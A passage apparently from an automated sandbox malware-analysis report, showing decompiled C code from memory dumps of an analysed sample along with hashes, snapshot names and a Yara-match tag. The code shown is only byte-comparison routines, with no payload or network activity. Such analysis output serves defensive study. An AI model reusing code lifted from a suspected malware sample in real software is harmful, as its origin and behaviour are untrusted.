                  							goto L1;
                  						}
                  						goto L10;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L8;
                  				}
                  				L1:
                  				_t192 = _t309;
                  				goto L3;
                  			}


                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: b05f44079d24200c9591e7e17f82823a4ec95cd84189ee831702fce5a720de00
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: A7D1B1B3E0A9B34A8736812D505813BEA626FD176035FC3E2CCD43F389D22B9D6195D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00429D1B(void* __eax, void* __ecx) {
                  				void* _t183;
                  				signed int _t184;
                  				void* _t187;
                  				signed char _t193;
                  				signed char _t194;
                  				signed char _t195;
                  				signed char _t196;
                  				signed char _t198;
                  				signed int _t296;
                  				void* _t299;
                  				void* _t301;
                  				void* _t303;
                  				void* _t306;
                  				void* _t308;
                  				void* _t310;
                  				void* _t313;
                  				void* _t315;
                  				void* _t317;
                  				void* _t320;
                  				void* _t322;
                  				void* _t324;
                  				void* _t327;
                  				void* _t329;
                  				void* _t331;
                  				void* _t334;
                  				void* _t336;
                  				void* _t338;
                  
                  				_t187 = __ecx;
                  				_t183 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                  					_t296 = 0;
                  					L12:
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					_t193 =  *(_t183 - 0x19);
                  					if(_t193 ==  *(_t187 - 0x19)) {
                  						_t296 = 0;
                  						L23:
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						_t194 =  *(_t183 - 0x15);
                  						if(_t194 ==  *(_t187 - 0x15)) {
                  							_t296 = 0;
                  							L34:
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							_t195 =  *(_t183 - 0x11);
                  							if(_t195 ==  *(_t187 - 0x11)) {
                  								_t296 = 0;
                  								L45:
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								_t196 =  *(_t183 - 0xd);
                  								if(_t196 ==  *(_t187 - 0xd)) {
                  									_t296 = 0;
                  									L56:
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                  										_t296 = 0;
                  										L67:
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										_t198 =  *(_t183 - 5);
                  										if(_t198 ==  *(_t187 - 5)) {
                  											_t296 = 0;
                  											L78:
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                  											if(_t184 != 0) {
                  												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                  											}
                  											L2:
                  											return _t184;
                  										}
                  										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                  										if(_t299 == 0) {
                  											L71:
                  											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                  											if(_t301 == 0) {
                  												L73:
                  												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                  												if(_t303 == 0) {
                  													L75:
                  													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                  													if(_t296 != 0) {
                  														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                  												if(_t296 != 0) {
                  													goto L1;
                  												}
                  												goto L75;
                  											}
                  											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L73;
                  										}
                  										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L71;
                  									}
                  									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                  									if(_t306 == 0) {
                  										L60:
                  										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                  										if(_t308 == 0) {
                  											L62:
                  											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                  											if(_t310 == 0) {
                  												L64:
                  												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                  												if(_t296 != 0) {
                  													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  												}
                  												goto L67;
                  											}
                  											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L64;
                  										}
                  										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L62;
                  									}
                  									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L60;
                  								}
                  								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                  								if(_t313 == 0) {
                  									L49:
                  									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                  									if(_t315 == 0) {
                  										L51:
                  										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                  										if(_t317 == 0) {
                  											L53:
                  											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                  											if(_t296 != 0) {
                  												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  											}
                  											goto L56;
                  										}
                  										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L53;
                  									}
                  									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L51;
                  								}
                  								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L49;
                  							}
                  							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                  							if(_t320 == 0) {
                  								L38:
                  								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                  								if(_t322 == 0) {
                  									L40:
                  									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                  									if(_t324 == 0) {
                  										L42:
                  										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                  										if(_t296 != 0) {
                  											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  										}
                  										goto L45;
                  									}
                  									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L42;
                  								}
                  								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L40;
                  							}
                  							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L38;
                  						}
                  						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                  						if(_t327 == 0) {
                  							L27:
                  							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                  							if(_t329 == 0) {
                  								L29:
                  								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                  								if(_t331 == 0) {
                  									L31:
                  									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                  									if(_t296 != 0) {
                  										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  									}
                  									goto L34;
                  								}
                  								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L31;
                  							}
                  							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L29;
                  						}
                  						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L27;
                  					}
                  					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                  					if(_t334 == 0) {
                  						L16:
                  						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                  						if(_t336 == 0) {
                  							L18:
                  							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                  							if(_t338 == 0) {
                  								L20:
                  								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                  								if(_t296 != 0) {
                  									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  								}
                  								goto L23;
                  							}
                  							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L20;
                  						}
                  						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L18;
                  					}
                  					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					goto L16;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  					if(__esi == 0) {
                  						L5:
                  						__esi =  *(__eax - 0x1c) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  						if(__esi == 0) {
                  							L7:
                  							__esi =  *(__eax - 0x1b) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  							if(__esi == 0) {
                  								L9:
                  								__esi =  *(__eax - 0x1a) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L12;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L9;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L7;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				_t184 = _t296;
                  				goto L2;
                  			}































                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: d2496cc9752ec4f49cc3a33794e1cb84df1cf8f33cfb87970b3baee92ab4ddb5
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: FCC1BFB3E1A9B30A8736812D516822BEE626FC176075FC3E6CCD43F389D62B5D4096D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00429947(void* __eax, void* __ecx) {
                  				void* _t177;
                  				signed int _t178;
                  				void* _t181;
                  				signed char _t187;
                  				signed char _t188;
                  				signed char _t189;
                  				signed char _t191;
                  				signed char _t192;
                  				signed int _t198;
                  				signed int _t284;
                  				void* _t287;
                  				void* _t289;
                  				void* _t291;
                  				void* _t293;
                  				void* _t295;
                  				void* _t297;
                  				void* _t300;
                  				void* _t302;
                  				void* _t304;
                  				void* _t307;
                  				void* _t309;
                  				void* _t311;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  
                  				_t181 = __ecx;
                  				_t177 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                  					_t284 = 0;
                  					L11:
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					_t187 =  *(_t177 - 0x18);
                  					if(_t187 ==  *(_t181 - 0x18)) {
                  						_t284 = 0;
                  						L22:
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						_t188 =  *(_t177 - 0x14);
                  						if(_t188 ==  *(_t181 - 0x14)) {
                  							_t284 = 0;
                  							L33:
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							_t189 =  *(_t177 - 0x10);
                  							if(_t189 ==  *(_t181 - 0x10)) {
                  								_t284 = 0;
                  								L44:
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                  									_t284 = 0;
                  									L55:
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									_t191 =  *(_t177 - 8);
                  									if(_t191 ==  *(_t181 - 8)) {
                  										_t284 = 0;
                  										L66:
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										_t192 =  *(_t177 - 4);
                  										if(_t192 ==  *(_t181 - 4)) {
                  											_t178 = 0;
                  											L78:
                  											if(_t178 == 0) {
                  												_t178 = 0;
                  											}
                  											L80:
                  											return _t178;
                  										}
                  										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                  										if(_t287 == 0) {
                  											L70:
                  											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                  											if(_t289 == 0) {
                  												L72:
                  												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                  												if(_t291 == 0) {
                  													L75:
                  													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                  													if(_t178 != 0) {
                  														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                  												if(_t198 == 0) {
                  													goto L75;
                  												}
                  												L74:
                  												_t178 = _t198;
                  												goto L78;
                  											}
                  											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                  											if(_t198 != 0) {
                  												goto L74;
                  											}
                  											goto L72;
                  										}
                  										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                  										if(_t198 != 0) {
                  											goto L74;
                  										}
                  										goto L70;
                  									}
                  									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                  									if(_t293 == 0) {
                  										L59:
                  										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                  										if(_t295 == 0) {
                  											L61:
                  											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                  											if(_t297 == 0) {
                  												L63:
                  												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                  												if(_t284 != 0) {
                  													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  												}
                  												goto L66;
                  											}
                  											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                  											if(_t284 != 0) {
                  												goto L1;
                  											}
                  											goto L63;
                  										}
                  										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L61;
                  									}
                  									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L59;
                  								}
                  								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                  								if(_t300 == 0) {
                  									L48:
                  									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                  									if(_t302 == 0) {
                  										L50:
                  										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                  										if(_t304 == 0) {
                  											L52:
                  											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                  											if(_t284 != 0) {
                  												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  											}
                  											goto L55;
                  										}
                  										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L52;
                  									}
                  									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L50;
                  								}
                  								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L48;
                  							}
                  							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                  							if(_t307 == 0) {
                  								L37:
                  								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                  								if(_t309 == 0) {
                  									L39:
                  									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                  									if(_t311 == 0) {
                  										L41:
                  										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                  										if(_t284 != 0) {
                  											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  										}
                  										goto L44;
                  									}
                  									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L41;
                  								}
                  								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L39;
                  							}
                  							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L37;
                  						}
                  						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                  						if(_t314 == 0) {
                  							L26:
                  							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                  							if(_t316 == 0) {
                  								L28:
                  								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                  								if(_t318 == 0) {
                  									L30:
                  									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                  									if(_t284 != 0) {
                  										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  									}
                  									goto L33;
                  								}
                  								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L30;
                  							}
                  							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L28;
                  						}
                  						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L26;
                  					}
                  					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                  					if(_t321 == 0) {
                  						L15:
                  						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                  						if(_t323 == 0) {
                  							L17:
                  							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                  							if(_t325 == 0) {
                  								L19:
                  								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                  								if(_t284 != 0) {
                  									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  								}
                  								goto L22;
                  							}
                  							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L19;
                  						}
                  						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L17;
                  					}
                  					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					goto L15;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  					if(__esi == 0) {
                  						L4:
                  						__esi =  *(__eax - 0x1b) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  						if(__esi == 0) {
                  							L6:
                  							__esi =  *(__eax - 0x1a) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  							if(__esi == 0) {
                  								L8:
                  								__esi =  *(__eax - 0x19) & 0x000000ff;
                  								__edx =  *(__ecx - 0x19) & 0x000000ff;
                  								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L11;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L8;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L6;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L4;
                  				}
                  				L1:
                  				_t178 = _t284;
                  				goto L80;
                  			}

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: 02d8d868b58e4d08d634cae864bce3e8c801d264febfcb148cc477add30e740c
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: BBC192B3E0A9B30A8736812D605853BEEA26FD176076EC3E68CD43F38DD12A9D4195D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: d909e4edd0c35469dcd36e81c14f2c2f649a8c8e6389960df52b0641279cc1ce
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 2F41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: fe32f3edfacaf7bd9adbe0b6f7dcd06a8681dcb57296a03c81204c6977a645b5
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: AB41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 7ba0beb40df41ae386b3346759cfe7db60139674416066b8bc350a6a8b9117f7
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 7C319F3661474A8FC724DF18D4C0F2AB7E4FF88344F450AADE59587312D330E9168B91
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297130492.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_4f0000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
